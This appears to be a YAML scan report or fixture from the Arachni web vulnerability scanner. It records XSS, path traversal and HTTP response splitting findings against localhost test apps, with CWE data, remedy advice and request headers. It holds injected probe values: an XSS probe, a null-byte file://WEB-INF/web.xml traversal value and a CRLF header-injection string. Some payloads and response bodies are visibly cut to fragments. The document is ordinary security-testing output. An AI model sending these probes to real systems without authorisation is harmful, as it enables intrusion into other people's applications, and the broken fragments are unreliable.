TW9uLCAxMSBGZWIgMjAxMyAwNjoxODo0NiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Scripting (XSS)
description: ! "Client-side code (like JavaScript) can\n be injected into the
web application which is then returned to the user's browser.\n This can
lead to a compromise of the client's system or serve as a pivoting point for
other attacks."
tags:
- xss
- regexp
- injection
- script
cwe: '79'
cwe_url: http://cwe.mitre.org/data/definitions/79.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
returned as part of the HTML code of a page."
mod_name: XSS
variations: []
internal_modname: XSS
internal_modname: XSS
- !ruby/object:Arachni::Issue
verification: false
references:
ha.ckers: http://ha.ckers.org/xss.html
Secunia: http://secunia.com/advisories/9716/
var: input
url: http://localhost:8029/link/straight?input=default
elem: link
method: GET
name: Cross-Site Scripting (XSS)
description: ! "Client-side code (like JavaScript) can\n be injected into the
web application which is then returned to the user's browser.\n This can lead
to a compromise of the client's system or serve as a pivoting point for other
attacks."
tags:
- xss
- regexp
- injection
- script
cwe: '79'
cwe_url: http://cwe.mitre.org/data/definitions/79.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
returned as part of the HTML code of a page."
mod_name: XSS
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
ha.ckers: http://ha.ckers.org/xss.html
Secunia: http://secunia.com/advisories/9716/
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 3
:flip_param: true
:injected_orig:
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=":
:follow_location: true
:injected:
:combo:
!binary "aW5wdXQ=":
:action: http://localhost:8029/link/straight?input=default
:match:
:regexp: ''
var: input
url: http://localhost:8029/link/straight?input=default
injected:
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response:
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxODo0OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Scripting (XSS)
description: ! "Client-side code (like JavaScript) can\n be injected into the
web application which is then returned to the user's browser.\n This can
lead to a compromise of the client's system or serve as a pivoting point for
other attacks."
tags:
- xss
- regexp
- injection
- script
cwe: '79'
cwe_url: http://cwe.mitre.org/data/definitions/79.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
returned as part of the HTML code of a page."
mod_name: XSS
variations: []
internal_modname: XSS
internal_modname: XSS
- !ruby/object:Arachni::Issue
verification: false
references:
ha.ckers: http://ha.ckers.org/xss.html
Secunia: http://secunia.com/advisories/9716/
var: input
url: http://localhost:8029/link/in_textfield?input=default
elem: link
method: GET
name: Cross-Site Scripting (XSS)
description: ! "Client-side code (like JavaScript) can\n be injected into the
web application which is then returned to the user's browser.\n This can lead
to a compromise of the client's system or serve as a pivoting point for other
attacks."
tags:
- xss
- regexp
- injection
- script
cwe: '79'
cwe_url: http://cwe.mitre.org/data/definitions/79.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
returned as part of the HTML code of a page."
mod_name: XSS
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
ha.ckers: http://ha.ckers.org/xss.html
Secunia: http://secunia.com/advisories/9716/
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 3
:flip_param: true
:injected_orig: ! '''-;'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! '''-;'
:follow_location: true
:injected: ! '''-;'
:combo:
!binary "aW5wdXQ=": ! '''-;'
:action: http://localhost:8029/link/in_textfield?input=default
:match: ! '''-;'
:regexp: ''
var: input
url: http://localhost:8029/link/in_textfield?input=default
injected: ! '''-;'
id:
regexp: ''
regexp_match: ! '''-;'
elem: link
remarks: {}
method: GET
response: ! '
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE3
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxODo0OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Scripting (XSS)
description: ! "Client-side code (like JavaScript) can\n be injected into the
web application which is then returned to the user's browser.\n This can
lead to a compromise of the client's system or serve as a pivoting point for
other attacks."
tags:
- xss
- regexp
- injection
- script
cwe: '79'
cwe_url: http://cwe.mitre.org/data/definitions/79.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
returned as part of the HTML code of a page."
mod_name: XSS
variations: []
internal_modname: XSS
internal_modname: XSS
- !ruby/object:Arachni::Issue
verification: false
references:
ha.ckers: http://ha.ckers.org/xss.html
Secunia: http://secunia.com/advisories/9716/
var: input
url: http://localhost:8029/link/in_comment?input=default
elem: link
method: GET
name: Cross-Site Scripting (XSS)
description: ! "Client-side code (like JavaScript) can\n be injected into the
web application which is then returned to the user's browser.\n This can lead
to a compromise of the client's system or serve as a pivoting point for other
attacks."
tags:
- xss
- regexp
- injection
- script
cwe: '79'
cwe_url: http://cwe.mitre.org/data/definitions/79.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
returned as part of the HTML code of a page."
mod_name: XSS
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
ha.ckers: http://ha.ckers.org/xss.html
Secunia: http://secunia.com/advisories/9716/
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 3
:flip_param: true
:injected_orig: -->
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxODo0OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Cross-Site Scripting (XSS)
description: ! "Client-side code (like JavaScript) can\n be injected into the
web application which is then returned to the user's browser.\n This can
lead to a compromise of the client's system or serve as a pivoting point for
other attacks."
tags:
- xss
- regexp
- injection
- script
cwe: '79'
cwe_url: http://cwe.mitre.org/data/definitions/79.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
returned as part of the HTML code of a page."
mod_name: XSS
variations: []
internal_modname: XSS
internal_modname: XSS
- !ruby/object:Arachni::Issue
verification: false
references:
ha.ckers: http://ha.ckers.org/xss.html
Secunia: http://secunia.com/advisories/9716/
var: cookie
url: http://localhost:8029/cookie/straight
elem: cookie
method: GET
name: Cross-Site Scripting (XSS)
description: ! "Client-side code (like JavaScript) can\n be injected into the
web application which is then returned to the user's browser.\n This can lead
to a compromise of the client's system or serve as a pivoting point for other
attacks."
tags:
- xss
- regexp
- injection
- script
cwe: '79'
cwe_url: http://cwe.mitre.org/data/definitions/79.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
returned as part of the HTML code of a page."
mod_name: XSS
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
ha.ckers: http://ha.ckers.org/xss.html
Secunia: http://secunia.com/advisories/9716/
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 3
:flip_param: true
:injected_orig: -->
++\n \n \n Weak
authentication - basic\n /passive/session/weak-authentication-basic.jsp\n
\ \n \n tomcat\n
\ role1\n \n \n\n
\ \n \n
\ BASIC\n Application\n
\ \n \n\n
\ \n \n
\ \n The role that is required to access protected pages\n
\ \n tomcat\n \n\n
\ \n \n The role that is required to access
protected pages\n \n role1\n \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=default.html
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc4Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations: []
internal_modname: PathTraversal
internal_modname: PathTraversal
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
var: input
url: http://localhost:5784/tomcat/form/with_null
elem: form
method: POST
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n
\ \n index.html\n index.htm\n
\ index.jsp\n default.html\n
\ default.htm\n default.jsp\n
\ \n\n \n \n \n Weak
authentication - basic\n /passive/session/weak-authentication-basic.jsp\n
\ \n \n tomcat\n
\ role1\n \n \n\n
\ \n \n
\ BASIC\n Application\n
\ \n \n\n
\ \n \n
\ \n The role that is required to access protected pages\n
\ \n tomcat\n \n\n
\ \n \n The role that is required to access
protected pages\n \n role1\n \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=default.html
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc4Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations: []
internal_modname: PathTraversal
internal_modname: PathTraversal
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
var: input
url: http://localhost:5784/tomcat/link/with_null?input=default.html
elem: link
method: GET
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n
\ \n index.html\n index.htm\n
\ index.jsp\n default.html\n
\ default.htm\n default.jsp\n
\ \n\n \n \n \n Weak
authentication - basic\n /passive/session/weak-authentication-basic.jsp\n
\ \n \n tomcat\n
\ role1\n \n \n\n
\ \n \n
\ BASIC\n Application\n
\ \n \n\n
\ \n \n
\ \n The role that is required to access protected pages\n
\ \n tomcat\n \n\n
\ \n \n The role that is required to access
protected pages\n \n role1\n \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=default.html
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc4Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations: []
internal_modname: PathTraversal
internal_modname: PathTraversal
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
var: input
url: http://localhost:5784/tomcat/link/straight?input=default.html
elem: link
method: GET
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n
\ \n index.html\n index.htm\n
\ index.jsp\n default.html\n
\ default.htm\n default.jsp\n
\ \n\n \n \n \n Weak
authentication - basic\n /passive/session/weak-authentication-basic.jsp\n
\ \n \n tomcat\n
\ role1\n \n \n\n
\ \n \n
\ BASIC\n Application\n
\ \n \n\n
\ \n \n
\ \n The role that is required to access protected pages\n
\ \n tomcat\n \n\n
\ \n \n The role that is required to access
protected pages\n \n role1\n \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=default.html
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc4Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations: []
internal_modname: PathTraversal
internal_modname: PathTraversal
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
var: cookie
url: http://localhost:5784/tomcat/cookie/straight
elem: cookie
method: GET
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n
\ \n index.html\n index.htm\n
\ index.jsp\n default.html\n
\ default.htm\n default.jsp\n
\ \n\n \n \n \n Weak
authentication - basic\n /passive/session/weak-authentication-basic.jsp\n
\ \n \n tomcat\n
\ role1\n \n \n\n
\ \n \n
\ BASIC\n Application\n
\ \n \n\n
\ \n \n
\ \n The role that is required to access protected pages\n
\ \n tomcat\n \n\n
\ \n \n The role that is required to access
protected pages\n \n role1\n \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=file://WEB-INF/web.xml
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc4Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTozOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations: []
internal_modname: PathTraversal
internal_modname: PathTraversal
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
var: User-Agent
url: http://localhost:5784/tomcat/header/straight
elem: header
method: GET
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Path_Traversal
WASC: http://projects.webappsec.org/Path-Traversal
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\n\n VulnerabilityDetectionChallenge\n
\ \n index.html\n index.htm\n
\ index.jsp\n default.html\n
\ default.htm\n default.jsp\n
\ \n\n \n \n \n Weak
authentication - basic\n /passive/session/weak-authentication-basic.jsp\n
\ \n \n tomcat\n
\ role1\n \n \n\n
\ \n \n
\ BASIC\n Application\n
\ \n \n\n
\ \n \n
\ \n The role that is required to access protected pages\n
\ \n tomcat\n \n\n
\ \n \n The role that is required to access
protected pages\n \n role1\n \n"
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: !binary |-
ZmlsZTovL1dFQi1JTkYvd2ViLnhtbAAu
Cookie: cookie=default.html
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc4Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo0NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Path Traversal
description: ! "The web application enforces improper limitation\n of a pathname
to a restricted directory."
tags:
- path
- traversal
- injection
- regexp
cwe: '22'
cwe_url: http://cwe.mitre.org/data/definitions/22.html
severity: Medium
cvssv2: '4.3'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used as a part of a filesystem path."
remedy_code: ''
metasploitable: unix/webapp/arachni_path_traversal
mod_name: Path Traversal
variations: []
internal_modname: PathTraversal
internal_modname: PathTraversal
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
var: input
url: http://localhost:10519/form/straight
elem: form
method: GET
name: Response Splitting
description: ! "The web application includes user input\n in the response HTTP
header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:param_flip: true
:follow_location: false
:injected_orig: ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:injected: !binary |-
JTBEJTBBWC1DUkxGLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNh
ZTE5Njg1Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OTolMjBubw==
:combo:
!binary "aW5wdXQ=": ! "\r\nX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:
no"
:action: http://localhost:10519/form/straight
:regexp: ''
var: input
url: http://localhost:10519/form/straight
injected: ! '%0D%0AX-CRLF-Safe-95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59:%20no'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
? !binary |-
WC1DcmxmLVNhZmUtOTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1
Y2EzOGU1ZjNlNDIyOGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
: !binary |-
bm8=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMjoyNTo1MyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Response Splitting
description: ! "The web application includes user input\n in the response
HTTP header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations: []
internal_modname: ResponseSplitting
internal_modname: ResponseSplitting
- !ruby/object:Arachni::Issue
verification: false
references:
SecuriTeam: http://www.securiteam.com/securityreviews/5WP0E2KFGK.html
OWASP: http://www.owasp.org/index.php/HTTP_Response_Splitting
var: input
url: http://localhost:10519/form/append
elem: form
method: GET
name: Response Splitting
description: ! "The web application includes user input\n in the response HTTP
header."
tags:
- response
- splitting
- injection
- header
cwe: '20'
cwe_url: http://cwe.mitre.org/data/definitions/20.html
severity: Medium
cvssv2: '5.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included as part of the HTTP response headers."
remedy_code: ''
mod_name: Response Splitting
variations:
- !ruby/object:Arachni::Issue
